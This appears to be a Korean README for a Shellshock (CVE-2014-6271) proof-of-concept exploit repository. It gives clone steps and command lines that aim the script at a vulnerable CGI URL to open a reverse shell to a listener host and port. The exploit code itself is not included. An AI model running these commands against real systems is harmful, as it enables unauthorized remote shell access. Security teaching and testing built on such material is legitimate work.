
Shellshock 익스플로잇 (CVE-2014-6271)
이 저장소는 유닉스 기반 시스템에 영향을 미치는 취약점에 대한 익스플로잇을 포함하고 있습니다. 이는 교육 목적으로 제작된 개념 증명 스크립트에 불과하며, 책임감 있게 사용해야 합니다.
이 익스플로잇은 셸쇼크 공격이 어떻게 작동하는지, 그리고 악의적으로 조작된 요청 헤더를 통해 시스템에 셸 접근 권한을 획득하는 데 어떻게 사용될 수 있는지 보여주기 위해 설계되었습니다.
이 저장소는 교육 목적으로만 제공됩니다. 이 코드나 포함된 정보를 악의적인 목적으로 사용하지 마십시오. 항상 윤리 지침을 따르고 법을 준수하십시오.
사용법:
python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]
예시:
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
전제 조건:
이 저장소를 로컬 머신에 클론하세요.
git clone https://github.com/AlissonFaoli/Shellshock.git
프로젝트 디렉토리로 이동하세요.
cd Shellshock
shellshock.py 스크립트를 실행하세요.
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
이 익스플로잇은 MIT 라이선스 하에 배포됩니다. 자세한 내용은 LICENSE 파일에서 확인할 수 있습니다.
이 익스플로잇에 대해 질문이나 우려 사항이 있으면 언제든지 저자에게 연락해 주십시오.